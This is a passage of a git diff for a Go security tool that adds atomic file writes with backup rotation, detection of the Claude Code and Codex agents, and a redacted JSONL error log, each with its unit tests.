Best-effort: stat/remove errors are swallowed. Rotation must not fail +// the surrounding write — at worst a few extra backups stick around. +func pruneBackups(path string, keep int) { + pool := []string{} + for _, pattern := range []string{path + BackupPrefix + "*" + BackupExt, path + ".dmg-backup.*"} { + m, _ := filepath.Glob(pattern) + pool = append(pool, m...) + } + if len(pool) <= keep { + return + } + type entry struct { + name string + mtime time.Time + } + entries := make([]entry, 0, len(pool)) + for _, p := range pool { + info, err := os.Stat(p) + if err != nil { + continue + } + entries = append(entries, entry{p, info.ModTime()}) + } + sort.Slice(entries, func(i, j int) bool { return entries[i].mtime.After(entries[j].mtime) }) + for i := keep; i < len(entries); i++ { + _ = os.Remove(entries[i].name) + } +} + +// WriteAtomic writes data to path atomically. Parent directories are +// created (and reported) as needed; any existing file is backed up first. +// +// The temp file lives in the target directory (same filesystem) so the +// final rename is atomic on POSIX. +func WriteAtomic(path string, data []byte, mode os.FileMode) (WriteResult, error) { + result := WriteResult{Path: path} + + backup, err := TakeBackup(path, time.Now()) + if err != nil { + return result, fmt.Errorf("atomicfile: backup: %w", err) + } + result.BackupPath = backup + + parent := filepath.Dir(path) + created, err := mkdirAllTracking(parent, 0o755) + if err != nil { + return result, fmt.Errorf("atomicfile: mkdir parents: %w", err) + } + result.CreatedDirs = created + + tmp, err := os.CreateTemp(parent, "."+filepath.Base(path)+".tmp-*") + if err != nil { + return result, fmt.Errorf("atomicfile: create temp: %w", err) + } + tmpPath := tmp.Name() + + // Best-effort cleanup if anything below fails. Ignored on the success + // path because rename consumes the temp. + defer func() { + if _, statErr := os.Stat(tmpPath); statErr == nil { + _ = os.Remove(tmpPath) + } + }() + + if _, err := tmp.Write(data); err != nil { + _ = tmp.Close() + return result, fmt.Errorf("atomicfile: write temp: %w", err) + } + if err := tmp.Sync(); err != nil { + _ = tmp.Close() + return result, fmt.Errorf("atomicfile: fsync temp: %w", err) + } + if err := tmp.Close(); err != nil { + return result, fmt.Errorf("atomicfile: close temp: %w", err) + } + if err := os.Chmod(tmpPath, mode.Perm()); err != nil { + return result, fmt.Errorf("atomicfile: chmod temp: %w", err) + } + if err := os.Rename(tmpPath, path); err != nil { + return result, fmt.Errorf("atomicfile: rename: %w", err) + } + + return result, nil +} + +// InstallBytes is a thin alias used at install sites to make intent clear: +// "install these bytes at this path." Implementation is identical to +// WriteAtomic. +func InstallBytes(path string, data []byte, mode os.FileMode) (WriteResult, error) { + return WriteAtomic(path, data, mode) +} + +// mkdirAllTracking creates path (and any missing ancestors) with the given +// perm, returning only the directories it actually created — existing +// dirs are excluded. Order is shallowest-first so chown can apply parent +// before child without TOCTOU concerns. +func mkdirAllTracking(path string, perm os.FileMode) ([]string, error) { + var toCreate []string + cur := filepath.Clean(path) + + for { + info, err := os.Stat(cur) + switch { + case err == nil && info.IsDir(): + // Reached an existing dir — stop walking up. + goto create + case err == nil: + return nil, fmt.Errorf("atomicfile: %s exists but is not a directory", cur) + case !os.IsNotExist(err): + return nil, err + } + + toCreate = append([]string{cur}, toCreate...) + parent := filepath.Dir(cur) + if parent == cur { + // Hit filesystem root with no existing ancestor. + return nil, fmt.Errorf("atomicfile: cannot create %s: no existing ancestor", path) + } + cur = parent + } + +create: + for _, d := range toCreate { + if err := os.Mkdir(d, perm.Perm()); err != nil && !os.IsExist(err) { + return toCreate, err + } + } + return toCreate, nil +} diff --git a/internal/aiagents/atomicfile/atomicfile_test.go b/internal/aiagents/atomicfile/atomicfile_test.go new file mode 100644 index 0000000..c0e6711 --- /dev/null +++ b/internal/aiagents/atomicfile/atomicfile_test.go @@ -0,0 +1,362 @@ +package atomicfile + +import ( + "os" + "path/filepath" + "strings" + "testing" + "time" +) + +func TestPickMode_NoExistingFile(t *testing.T) { + dir := t.TempDir() + got := PickMode(filepath.Join(dir, "nope"), 0o600) + if got != 0o600 { + t.Errorf("PickMode on missing file = %o, want fallback 0o600", got) + } +} + +func TestPickMode_PreservesExistingMode(t *testing.T) { + dir := t.TempDir() + path := filepath.Join(dir, "f") + if err := os.WriteFile(path, []byte("x"), 0o640); err != nil { + t.Fatal(err) + } + got := PickMode(path, 0o644) + if got != 0o640 { + t.Errorf("PickMode = %o, want existing mode 0o640", got) + } +} + +func TestTakeBackup_NoSource(t *testing.T) { + dir := t.TempDir() + got, err := TakeBackup(filepath.Join(dir, "missing"), time.Now()) + if err != nil { + t.Fatal(err) + } + if got != "" { + t.Errorf("expected empty backup path for missing source, got %q", got) + } +} + +func TestTakeBackup_ProducesCorrectShape(t *testing.T) { + dir := t.TempDir() + src := filepath.Join(dir, "settings.json") + if err := os.WriteFile(src, []byte(`{"old":true}`), 0o644); err != nil { + t.Fatal(err) + } + + stamp := time.Date(2026, 5, 5, 12, 34, 56, 0, time.UTC) + got, err := TakeBackup(src, stamp) + if err != nil { + t.Fatal(err) + } + want := src + ".dmg-20260505T123456.bak" + if got != want { + t.Errorf("backup path = %q, want %q", got, want) + } + + // Backup contents must match the source. + data, err := os.ReadFile(got) + if err != nil { + t.Fatal(err) + } + if string(data) != `{"old":true}` { + t.Errorf("backup content mismatch: %q", string(data)) + } +} + +func TestWriteAtomic_FreshInstall_NoBackup(t *testing.T) { + dir := t.TempDir() + path := filepath.Join(dir, "hooks.json") + res, err := WriteAtomic(path, []byte("{}"), 0o600) + if err != nil { + t.Fatal(err) + } + if res.BackupPath != "" { + t.Errorf("expected no backup on fresh install, got %q", res.BackupPath) + } + if res.Path != path { + t.Errorf("Path = %q, want %q", res.Path, path) + } + + got, err := os.ReadFile(path) + if err != nil { + t.Fatal(err) + } + if string(got) != "{}" { + t.Errorf("file content = %q, want %q", string(got), "{}") + } + + info, err := os.Stat(path) + if err != nil { + t.Fatal(err) + } + if info.Mode().Perm() != 0o600 { + t.Errorf("file mode = %o, want 0o600", info.Mode().Perm()) + } +} + +func TestWriteAtomic_OverwriteWithBackup(t *testing.T) { + dir := t.TempDir() + path := filepath.Join(dir, "settings.json") + if err := os.WriteFile(path, []byte("OLD"), 0o644); err != nil { + t.Fatal(err) + } + + res, err := WriteAtomic(path, []byte("NEW"), 0o644) + if err != nil { + t.Fatal(err) + } + if res.BackupPath == "" { + t.Fatal("expected a backup path when target file pre-existed") + } + if !strings.Contains(res.BackupPath, ".dmg-") || !strings.HasSuffix(res.BackupPath, ".bak") { + t.Errorf("backup path missing rebrand: %q", res.BackupPath) + } + + gotNew, _ := os.ReadFile(path) + if string(gotNew) != "NEW" { + t.Errorf("target file = %q, want %q", string(gotNew), "NEW") + } + gotOld, _ := os.ReadFile(res.BackupPath) + if string(gotOld) != "OLD" { + t.Errorf("backup file = %q, want %q", string(gotOld), "OLD") + } +} + +func TestWriteAtomic_CreatesParentDirsAndReportsThem(t *testing.T) { + dir := t.TempDir() + deep := filepath.Join(dir, "a", "b", "c", "settings.json") + + res, err := WriteAtomic(deep, []byte("{}"), 0o600) + if err != nil { + t.Fatal(err) + } + + wantCreated := []string{ + filepath.Join(dir, "a"), + filepath.Join(dir, "a", "b"), + filepath.Join(dir, "a", "b", "c"), + } + if len(res.CreatedDirs) != len(wantCreated) { + t.Fatalf("CreatedDirs = %v, want %v", res.CreatedDirs, wantCreated) + } + for i, w := range wantCreated { + if res.CreatedDirs[i] != w { + t.Errorf("CreatedDirs[%d] = %q, want %q", i, res.CreatedDirs[i], w) + } + } + + if _, err := os.Stat(deep); err != nil { + t.Errorf("file not created: %v", err) + } +} + +func TestWriteAtomic_DoesNotReportPreexistingParents(t *testing.T) { + dir := t.TempDir() + // dir already exists; writing directly under it should report nothing. + path := filepath.Join(dir, "hooks.json") + res, err := WriteAtomic(path, []byte("{}"), 0o600) + if err != nil { + t.Fatal(err) + } + if len(res.CreatedDirs) != 0 { + t.Errorf("expected empty CreatedDirs when parent existed, got %v", res.CreatedDirs) + } +} + +// listBackups returns every backup sibling of src that the rotation +// considers part of the pool (.dmg-*.bak + legacy .dmg-backup.*). +// Anything else in the directory is ignored. +func listBackups(t *testing.T, src string) []string { + t.Helper() + var out []string + for _, pattern := range []string{src + ".dmg-*.bak", src + ".dmg-backup.*"} { + m, err := filepath.Glob(pattern) + if err != nil { + t.Fatal(err) + } + out = append(out, m...) + } + return out +} + +// writeBackupAt creates a backup file at path with mtime set to ts. The +// content is irrelevant; rotation sorts by mtime, not contents. +func writeBackupAt(t *testing.T, path string, ts time.Time) { + t.Helper() + if err := os.WriteFile(path, []byte("old"), 0o600); err != nil { + t.Fatal(err) + } + if err := os.Chtimes(path, ts, ts); err != nil { + t.Fatal(err) + } +} + +func TestTakeBackup_PrunesPastCap(t *testing.T) { + dir := t.TempDir() + src := filepath.Join(dir, "settings.json") + if err := os.WriteFile(src, []byte("CURRENT"), 0o600); err != nil { + t.Fatal(err) + } + + // Five pre-existing backups with strictly increasing mtimes. Names + // embed the same stamps so debugging output is readable, but the + // prune sorts by mtime, not by name. + base := time.Date(2026, 5, 1, 12, 0, 0, 0, time.UTC) + for i := range 5 { + ts := base.Add(time.Duration(i) * time.Hour) + writeBackupAt(t, src+BackupPrefix+ts.Format(BackupStampLayout)+BackupExt, ts) + } + + // New backup is taken "now" (later than all pre-existing mtimes). + now := base.Add(24 * time.Hour) + got, err := TakeBackup(src, now) + if err != nil { + t.Fatal(err) + } + + survivors := listBackups(t, src) + if len(survivors) != MaxBackups { + t.Fatalf("expected %d survivors after prune, got %d: %v", MaxBackups, len(survivors), survivors) + } + + // Survivors must include the freshly-taken one + the two + // most-recent pre-existing backups (hours +3 and +4). + want := map[string]bool{ + got: true, + src + BackupPrefix + base.Add(3*time.Hour).Format(BackupStampLayout) + BackupExt: true, + src + BackupPrefix + base.Add(4*time.Hour).Format(BackupStampLayout) + BackupExt: true, + } + for _, s := range survivors { + if !want[s] { + t.Errorf("unexpected survivor %q", s) + } + delete(want, s) + } + for missing := range want { + t.Errorf("expected survivor missing: %q", missing) + } +} + +func TestTakeBackup_PruneAcrossLegacyAndNewFormats(t *testing.T) { + dir := t.TempDir() + src := filepath.Join(dir, "hooks.json") + if err := os.WriteFile(src, []byte("CURRENT"), 0o600); err != nil { + t.Fatal(err) + } + + // Two legacy + two new-form, all older than the upcoming TakeBackup. + base := time.Date(2026, 5, 1, 12, 0, 0, 0, time.UTC) + legacyOldest := src + ".dmg-backup." + base.Format(BackupStampLayout) + writeBackupAt(t, legacyOldest, base) + legacyNewer := src + ".dmg-backup." + base.Add(time.Hour).Format(BackupStampLayout) + writeBackupAt(t, legacyNewer, base.Add(time.Hour)) + newOlder := src + BackupPrefix + base.Add(2*time.Hour).Format(BackupStampLayout) + BackupExt + writeBackupAt(t, newOlder, base.Add(2*time.Hour)) + newNewest := src + BackupPrefix + base.Add(3*time.Hour).Format(BackupStampLayout) + BackupExt + writeBackupAt(t, newNewest, base.Add(3*time.Hour)) + + now := base.Add(24 * time.Hour) + got, err := TakeBackup(src, now) + if err != nil { + t.Fatal(err) + } + + survivors := listBackups(t, src) + if len(survivors) != MaxBackups { + t.Fatalf("expected %d survivors, got %d: %v", MaxBackups, len(survivors), survivors) + } + // Newest 3 = the just-taken one + newNewest + newOlder. Both + // legacy entries (older mtimes) must be pruned, demonstrating + // the cap holds across the format rename. + survSet := map[string]bool{} + for _, s := range survivors { + survSet[s] = true + } + for _, want := range []string{got, newNewest, newOlder} { + if !survSet[want] { + t.Errorf("expected survivor missing: %q", want) + } + } + for _, gone := range []string{legacyOldest, legacyNewer} { + if _, err := os.Stat(gone); !os.IsNotExist(err) { + t.Errorf("expected legacy backup pruned: %q (stat err=%v)", gone, err) + } + } +} + +func TestTakeBackup_DoesNotTouchUnrelatedSiblings(t *testing.T) { + dir := t.TempDir() + src := filepath.Join(dir, "settings.json") + if err := os.WriteFile(src, []byte("CURRENT"), 0o600); err != nil { + t.Fatal(err) + } + + // Four pre-existing DMG backups so the prune is forced to delete one. + base := time.Date(2026, 5, 1, 12, 0, 0, 0, time.UTC) + for i := range 4 { + ts := base.Add(time.Duration(i) * time.Hour) + writeBackupAt(t, src+BackupPrefix+ts.Format(BackupStampLayout)+BackupExt, ts) + } + + // Files the rotation must NOT touch: a different tool's backup, a + // user-named sibling, and a file with a different stem. + anchor := src + ".anchor-backup.20260501T120000" + userKeep := src + ".user-keep" + otherStem := filepath.Join(dir, "other.json.dmg-20260501T120000.bak") + for _, p := range []string{anchor, userKeep, otherStem} { + if err := os.WriteFile(p, []byte("keep"), 0o600); err != nil { + t.Fatal(err) + } + } + + if _, err := TakeBackup(src, base.Add(24*time.Hour)); err != nil { + t.Fatal(err) + } + + // Survivors of the DMG pool: cap honored. + if got := len(listBackups(t, src)); got != MaxBackups { + t.Errorf("DMG backup count after prune: got %d, want %d", got, MaxBackups) + } + // Unrelated files must all still exist. + for _, p := range []string{anchor, userKeep, otherStem} { + if _, err := os.Stat(p); err != nil { + t.Errorf("unrelated sibling pruned: %q: %v", p, err) + } + } +} + +func TestTakeBackup_NoOpUnderCap(t *testing.T) { + dir := t.TempDir() + src := filepath.Join(dir, "settings.json") + if err := os.WriteFile(src, []byte("CURRENT"), 0o600); err != nil { + t.Fatal(err) + } + + // One pre-existing backup; combined with the new one we'll be at 2, + // still under MaxBackups. + pre := src + BackupPrefix + "20260501T120000" + BackupExt + writeBackupAt(t, pre, time.Date(2026, 5, 1, 12, 0, 0, 0, time.UTC)) + + got, err := TakeBackup(src, time.Date(2026, 5, 2, 12, 0, 0, 0, time.UTC)) + if err != nil { + t.Fatal(err) + } + + survivors := listBackups(t, src) + if len(survivors) != 2 { + t.Fatalf("expected 2 survivors when under cap, got %d: %v", len(survivors), survivors) + } + survSet := map[string]bool{} + for _, s := range survivors { + survSet[s] = true + } + if !survSet[pre] { + t.Errorf("pre-existing backup pruned despite under-cap: %q", pre) + } + if !survSet[got] { + t.Errorf("freshly-taken backup missing: %q", got) + } +} diff --git a/internal/aiagents/cli/detect.go b/internal/aiagents/cli/detect.go new file mode 100644 index 0000000..96c09b9 --- /dev/null +++ b/internal/aiagents/cli/detect.go @@ -0,0 +1,98 @@ +package cli + +import ( + "context" + "fmt" + + "github.com/step-security/dev-machine-guard/internal/aiagents/adapter" + "github.com/step-security/dev-machine-guard/internal/aiagents/adapter/claudecode" + "github.com/step-security/dev-machine-guard/internal/aiagents/adapter/codex" + "github.com/step-security/dev-machine-guard/internal/executor" +) + +// SupportedAgents is the canonical list of agent names accepted by +// `--agent`. Order matters for user-facing diagnostics (the `unsupported +// agent` error lists them in this order) and for the default fan-out +// in selectAdapters. +// +// Adding a new agent means: append here, add a case in adapterForAgent, +// add the constructor case in allAdapters, and add the adapter package. +// No other changes are needed in this layer. +var SupportedAgents = []string{ + claudecode.AgentName, + codex.AgentName, +} + +// adapterForAgent maps an explicit agent name onto a constructed +// adapter. The single CLI seam between the user-facing `--agent` flag +// and the per-agent constructor. +// +// home is the user's home directory (each adapter computes its own +// settings paths from it). binaryPath is the absolute, symlink-resolved +// DMG binary path that adapters embed into the hook command they write +// to settings. +// +// Unsupported agents produce an error that names every supported agent +// so the user does not have to read source to learn the option list. +func adapterForAgent(agent, home, binaryPath string) (adapter.Adapter, error) { + switch agent { + case claudecode.AgentName: + return claudecode.New(home, binaryPath), nil + case codex.AgentName: + return codex.New(home, binaryPath), nil + default: + return nil, fmt.Errorf("unsupported agent %q (supported: %s, %s)", + agent, claudecode.AgentName, codex.AgentName) + } +} + +// allAdapters returns every adapter DMG knows about, in the order +// declared by SupportedAgents. Used by selectAdapters when the caller +// did not pin a specific agent so we fan out across whichever agents +// are actually present on disk. +func allAdapters(home, binaryPath string) []adapter.Adapter { + return []adapter.Adapter{ + claudecode.New(home, binaryPath), + codex.New(home, binaryPath), + } +} + +// selectAdapters resolves the install/uninstall target list from the +// `--agent` flag: +// +// - explicit agent: yields exactly that adapter, skipping detection. +// The user's explicit `--agent claude-code` is an unconditional +// opt-in — install proceeds even when the agent's CLI is not on +// $PATH (the user may install it later, or installs it in a +// non-PATH location and runs DMG from a wrapper). +// +// - empty agent: runs Detect across every known adapter; only those +// whose CLI binary `executor.LookPath` resolves are returned. +// Settings file presence is NOT a gate — the adapter creates its +// settings file from scratch on first install. +// +// Detect errors abort the whole selection: an unexpected error here +// (e.g. the executor itself broke) should not be silently swallowed +// into "no agents detected". Plain "not on $PATH" results, by +// contrast, are normal and produce Detected=false with a nil error +// from the adapter. +func selectAdapters(ctx context.Context, agent, home, binaryPath string, exec executor.Executor) ([]adapter.Adapter, error) { + if agent != "" { + a, err := adapterForAgent(agent, home, binaryPath) + if err != nil { + return nil, err + } + return []adapter.Adapter{a}, nil + } + var detected []adapter.Adapter + for _, a := range allAdapters(home, binaryPath) { + res, err := a.Detect(ctx, exec) + if err != nil { + return nil, fmt.Errorf("detect %s: %w", a.Name(), err) + } + if res.Detected { + detected = append(detected, a) + } + } + return detected, nil +} diff --git a/internal/aiagents/cli/detect_test.go b/internal/aiagents/cli/detect_test.go new file mode 100644 index 0000000..d749cea --- /dev/null +++ b/internal/aiagents/cli/detect_test.go @@ -0,0 +1,170 @@ +package cli + +import ( + "context" + "strings" + "testing" + + "github.com/step-security/dev-machine-guard/internal/aiagents/adapter" + "github.com/step-security/dev-machine-guard/internal/executor" +) + +const testBinary = "/usr/local/bin/stepsecurity-dev-machine-guard" + +func TestAdapterForAgentClaudeCode(t *testing.T) { + a, err := adapterForAgent("claude-code", t.TempDir(), testBinary) + if err != nil { + t.Fatal(err) + } + if a.Name() != "claude-code" { + t.Errorf("Name=%q", a.Name()) + } + if len(a.ManagedFiles()) != 1 { + t.Errorf("expected 1 managed file, got %v", a.ManagedFiles()) + } +} + +func TestAdapterForAgentCodex(t *testing.T) { + a, err := adapterForAgent("codex", t.TempDir(), testBinary) + if err != nil { + t.Fatal(err) + } + if a.Name() != "codex" { + t.Errorf("Name=%q", a.Name()) + } + if len(a.ManagedFiles()) != 2 { + t.Errorf("expected 2 managed files, got %v", a.ManagedFiles()) + } +} + +func TestAdapterForAgentUnsupportedListsBoth(t *testing.T) { + _, err := adapterForAgent("cursor", t.TempDir(), testBinary) + if err == nil { + t.Fatal("expected error") + } + msg := err.Error() + for _, want := range []string{"claude-code", "codex"} { + if !strings.Contains(msg, want) { + t.Errorf("error must mention %q, got %q", want, msg) + } + } + // The unsupported name itself must appear so the user sees what + // they typed. + if !strings.Contains(msg, "cursor") { + t.Errorf("error must echo the bad name; got %q", msg) + } +} + +func TestSupportedAgentsListIsCanonical(t *testing.T) { + want := []string{"claude-code", "codex"} + if len(SupportedAgents) != len(want) { + t.Fatalf("SupportedAgents len: got %v, want %v", SupportedAgents, want) + } + for i, n := range want { + if SupportedAgents[i] != n { + t.Errorf("SupportedAgents[%d]: got %q, want %q", i, SupportedAgents[i], n) + } + } +} + +func TestAllAdaptersReturnsBothInDeclaredOrder(t *testing.T) { + all := allAdapters(t.TempDir(), testBinary) + if len(all) != 2 { + t.Fatalf("expected 2 adapters, got %d", len(all)) + } + if all[0].Name() != "claude-code" { + t.Errorf("[0] Name=%q, want claude-code", all[0].Name()) + } + if all[1].Name() != "codex" { + t.Errorf("[1] Name=%q, want codex", all[1].Name()) + } +} + +// TestSelectAdaptersExplicitAgentSkipsDetection: an explicit `--agent +// claude-code` is an unconditional opt-in. The user's claude binary +// may not be on $PATH (e.g. they're about to install it, or invoke it +// from an unusual location); we MUST still construct and return that +// adapter. +func TestSelectAdaptersExplicitAgentSkipsDetection(t *testing.T) { + mock := executor.NewMock() // empty PATH + got, err := selectAdapters(context.Background(), "claude-code", t.TempDir(), testBinary, mock) + if err != nil { + t.Fatal(err) + } + if len(got) != 1 || got[0].Name() != "claude-code" { + t.Errorf("explicit --agent claude-code: got %v, want [claude-code]", names(got)) + } + + got, err = selectAdapters(context.Background(), "codex", t.TempDir(), testBinary, mock) + if err != nil { + t.Fatal(err) + } + if len(got) != 1 || got[0].Name() != "codex" { + t.Errorf("explicit --agent codex: got %v, want [codex]", names(got)) + } +} + +func TestSelectAdaptersExplicitUnsupportedReturnsError(t *testing.T) { + mock := executor.NewMock() + _, err := selectAdapters(context.Background(), "cursor", t.TempDir(), testBinary, mock) + if err == nil { + t.Fatal("expected error on unsupported agent") + } +} + +// TestSelectAdaptersDetectsByLookPath asserts that detection is by +// `executor.LookPath`, NOT by settings file existence. Settings files +// must NOT be present in this test (TempDir is empty), and yet both +// adapters must show up because their CLI binaries are on $PATH. +func TestSelectAdaptersDetectsByLookPath(t *testing.T) { + mock := executor.NewMock() + mock.SetPath("claude", "/usr/local/bin/claude") + mock.SetPath("codex", "/usr/local/bin/codex") + + got, err := selectAdapters(context.Background(), "", t.TempDir(), testBinary, mock) + if err != nil { + t.Fatal(err) + } + if len(got) != 2 { + t.Fatalf("expected both detected, got %v", names(got)) + } + if got[0].Name() != "claude-code" || got[1].Name() != "codex" { + t.Errorf("order: got %v, want [claude-code codex]", names(got)) + } +} + +func TestSelectAdaptersFiltersUndetectedAgents(t *testing.T) { + // Only claude on $PATH — codex must be filtered out. + mock := executor.NewMock() + mock.SetPath("claude", "/usr/local/bin/claude") + + got, err := selectAdapters(context.Background(), "", t.TempDir(), testBinary, mock) + if err != nil { + t.Fatal(err) + } + if len(got) != 1 || got[0].Name() != "claude-code" { + t.Errorf("got %v, want [claude-code]", names(got)) + } +} + +func TestSelectAdaptersNoneDetectedReturnsEmpty(t *testing.T) { + // Neither on $PATH — no error, just empty list. The install + // handler is responsible for emitting a "no agents detected" + // diagnostic. + mock := executor.NewMock() + got, err := selectAdapters(context.Background(), "", t.TempDir(), testBinary, mock) + if err != nil { + t.Fatal(err) + } + if len(got) != 0 { + t.Errorf("expected empty list when nothing on $PATH, got %v", names(got)) + } +} + +func names(adapters []adapter.Adapter) []string { + out := make([]string, len(adapters)) + for i, a := range adapters { + out[i] = a.Name() + } + return out +} diff --git a/internal/aiagents/cli/errlog.go b/internal/aiagents/cli/errlog.go new file mode 100644 index 0000000..e594b6e --- /dev/null +++ b/internal/aiagents/cli/errlog.go @@ -0,0 +1,108 @@ +package cli + +import ( + "encoding/json" + "os" + "path/filepath" + "time" + + "github.com/step-security/dev-machine-guard/internal/aiagents/redact" +) + +// ErrorLogFilename is the basename of the per-user errors log. It lives +// directly under ~/.stepsecurity/. +const ErrorLogFilename = "ai-agent-hook-errors.jsonl" + +// MaxErrorLogBytes triggers a truncate-and-restart before each append. +// At 5 MiB, individual entries < 4 KiB remain atomic on POSIX +// `O_APPEND` writes without advisory locks. +const MaxErrorLogBytes = 5 * 1024 * 1024 + +const ( + errorLogFileMode os.FileMode = 0o600 + errorLogParentDirMode os.FileMode = 0o700 +) + +// ErrorEntry is the JSONL shape of a single line in the errors log. +// Field tags are short to keep the file compact when something goes +// wrong on the hot path; eventID is omitted when not correlated to an +// upload. +type ErrorEntry struct { + Timestamp string `json:"ts"` + Stage string `json:"stage"` + Code string `json:"code"` + Message string `json:"message"` + EventID string `json:"event_id,omitempty"` +} + +// errorLogPathOverride redirects writes to a test-controlled location. +// "" means "use the default ~/.stepsecurity/ path." Only +// touched from same-package _test.go files; tests must restore on +// cleanup since this is package-level mutable state. +var errorLogPathOverride string + +// AppendError writes a single JSONL entry to the errors log. The call +// is best-effort: any failure (no $HOME, mkdir denied, marshal error, +// open denied, partial write) is silently dropped — the hot path's +// allow response must never be blocked by logging. +// +// The message is run through redact.String before being written to +// disk so a stray secret in an error message never lands in the +// on-disk log. +func AppendError(stage, code, message, eventID string) { + path := errorLogPath() + if path == "" { + return + } + + entry := ErrorEntry{ + Timestamp: time.Now().UTC().Format(time.RFC3339Nano), + Stage: stage, + Code: code, + Message: redact.String(message), + EventID: eventID, + } + data, err := json.Marshal(entry) + if err != nil { + return + } + data = append(data, '\n') + + if err := os.MkdirAll(filepath.Dir(path), errorLogParentDirMode); err != nil { + return + } + + // Truncate-and-restart at the size cap. We stat first to avoid the + // truncate when the file is small (the common case). Failure here is + // non-fatal: if we can't stat or truncate, fall through to append + // anyway so the entry isn't lost on a non-cap-related stat error. + if info, statErr := os.Stat(path); statErr == nil && info.Size() > MaxErrorLogBytes { + _ = os.Truncate(path, 0) + } + + f, err := os.OpenFile(path, os.O_WRONLY|os.O_CREATE|os.O_APPEND, errorLogFileMode) + if err != nil { + return + } + defer f.Close() + _, _ = f.Write(data) +} + +// ErrorLogPath returns the absolute path of the errors log for the +// current user (or the test override). Exposed for diagnostics paths +// that want to surface the location to the user. +func ErrorLogPath() string { + return errorLogPath() +} + +func errorLogPath() string { + if errorLogPathOverride != "" { + return errorLogPathOverride + } + home, err := os.UserHomeDir() + if err != nil || home == "" { + return "" + } + return filepath.Join(home, ".stepsecurity", ErrorLogFilename) +} + diff --git a/internal/aiagents/cli/errlog_test.go b/internal/aiagents/cli/errlog_test.go new file mode 100644 index 0000000..47cdfc6 --- /dev/null +++ b/internal/aiagents/cli/errlog_test.go @@ -0,0 +1,199 @@ +package cli + +import ( + "bufio" + "encoding/json" + "os" + "path/filepath" + "runtime" + "strings" + "testing" +) + +// withErrorLog redirects the errors log to a temp path for the test and +// restores the previous value on cleanup. Tests using this helper must +// not run in parallel — errorLogPathOverride is package-level state. +func withErrorLog(t *testing.T) string { + t.Helper() + tmp := filepath.Join(t.TempDir(), "errors.jsonl") + prev := errorLogPathOverride + errorLogPathOverride = tmp + t.Cleanup(func() { errorLogPathOverride = prev }) + return tmp +} + +func TestAppendError_CreatesFileWithMode0600(t *testing.T) { + if runtime.GOOS == "windows" { + t.Skip("file mode bits aren't preserved on Windows") + } + path := withErrorLog(t) + AppendError("install", "no_console_user", "running as root", "") + + info, err := os.Stat(path) + if err != nil { + t.Fatalf("stat: %v", err) + } + if info.Mode().Perm() != 0o600 { + t.Errorf("file mode = %o, want 0o600", info.Mode().Perm()) + } +} + +func TestAppendError_WritesJSONLEntry(t *testing.T) { + path := withErrorLog(t) + AppendError("upload", "http_500", "server error", "evt-abc") + + data, err := os.ReadFile(path) + if err != nil { + t.Fatalf("read: %v", err) + } + lines := strings.Split(strings.TrimRight(string(data), "\n"), "\n") + if len(lines) != 1 { + t.Fatalf("expected 1 line, got %d (%q)", len(lines), string(data)) + } + var entry ErrorEntry + if err := json.Unmarshal([]byte(lines[0]), &entry); err != nil { + t.Fatalf("unmarshal: %v (line=%q)", err, lines[0]) + } + if entry.Stage != "upload" || entry.Code != "http_500" || entry.Message != "server error" || entry.EventID != "evt-abc" { + t.Errorf("unexpected entry: %+v", entry) + } + if entry.Timestamp == "" { + t.Error("missing timestamp") + } +} + +func TestAppendError_OmitsEmptyEventID(t *testing.T) { + path := withErrorLog(t) + AppendError("install", "chown_failed", "permission denied", "") + + data, _ := os.ReadFile(path) + if strings.Contains(string(data), "event_id") { + t.Errorf("expected event_id field omitted when empty, got %q", string(data)) + } +} + +func TestAppendError_MultipleEntriesAppend(t *testing.T) { + path := withErrorLog(t) + AppendError("a", "1", "first", "") + AppendError("b", "2", "second", "evt-2") + AppendError("c", "3", "third", "") + + f, err := os.Open(path) + if err != nil { + t.Fatal(err) + } + defer f.Close() + scanner := bufio.NewScanner(f) + count := 0 + for scanner.Scan() { + count++ + var e ErrorEntry + if err := json.Unmarshal(scanner.Bytes(), &e); err != nil { + t.Errorf("line %d unmarshal: %v", count, err) + } + } + if count != 3 { + t.Errorf("expected 3 entries, got %d", count) + } +} + +func TestAppendError_TruncatesAtFiveMiB(t *testing.T) { + path := withErrorLog(t) + if err := os.MkdirAll(filepath.Dir(path), 0o700); err != nil { + t.Fatal(err) + } + // Pre-seed the file with > 5 MiB of garbage so the next AppendError + // trips the truncate-and-restart branch. + big := make([]byte, MaxErrorLogBytes+1024) + for i := range big { + big[i] = 'x' + } + if err := os.WriteFile(path, big, 0o600); err != nil { + t.Fatal(err) + } + + AppendError("install", "after_truncate", "fresh entry", "") + + info, err := os.Stat(path) + if err != nil { + t.Fatal(err) + } + if info.Size() >= int64(MaxErrorLogBytes) { + t.Errorf("expected file truncated and restarted, size = %d bytes", info.Size()) + } + data, _ := os.ReadFile(path) + if !strings.Contains(string(data), "after_truncate") { + t.Errorf("expected fresh entry after truncate, got %q", string(data)) + } +} + +func TestAppendError_NoHomeIsSilent(t *testing.T) { + prev := errorLogPathOverride + errorLogPathOverride = "" + t.Cleanup(func() { errorLogPathOverride = prev }) + + // Force the default-path branch with HOME unset. On Unix, t.Setenv + // works; on Windows os.UserHomeDir consults USERPROFILE/HOMEDRIVE, + // so we skip the assertion there — the contract under test is "no + // panic, silent drop" which is platform-independent in practice. + if runtime.GOOS != "windows" { + t.Setenv("HOME", "") + } + + // Must not panic, must not error, must not write anywhere observable. + AppendError("install", "no_home", "should be silently dropped", "") +} + +func TestAppendError_TimestampIsUTCNanoFormat(t *testing.T) { + path := withErrorLog(t) + AppendError("test", "fmt", "checking timestamp", "") + + data, _ := os.ReadFile(path) + var entry ErrorEntry + if err := json.Unmarshal(data[:len(data)-1], &entry); err != nil { + t.Fatal(err) + } + // RFC3339Nano UTC timestamps end with 'Z'. + if !strings.HasSuffix(entry.Timestamp, "Z") { + t.Errorf("timestamp %q is not UTC RFC3339Nano (no trailing Z)", entry.Timestamp) + } +} + +func TestAppendError_RedactsMessage(t *testing.T) { + // AppendError must run the message through redact.String before it + // hits disk. A bearer token in the message must NOT survive in the + // on-disk JSONL line. + path := withErrorLog(t) + AppendError("upload", "http_500", + "failed POST with Authorization: Bearer eyJ.payload.sig.AAAAAAAAAAA", + "evt-1") + + data, err := os.ReadFile(path) + if err != nil { + t.Fatalf("read: %v", err) + } + if strings.Contains(string(data), "eyJ.payload.sig.AAAAAAAAAAA") { + t.Errorf("bearer leaked into error log: %s", string(data)) + } + if !strings.Contains(string(data), "[REDACTED]") { + t.Errorf("expected [REDACTED] placeholder in log line, got: %s", string(data)) + } +} + +func TestErrorLogPath_DefaultUnderHome(t *testing.T) { + // Don't override; test the default branch. + 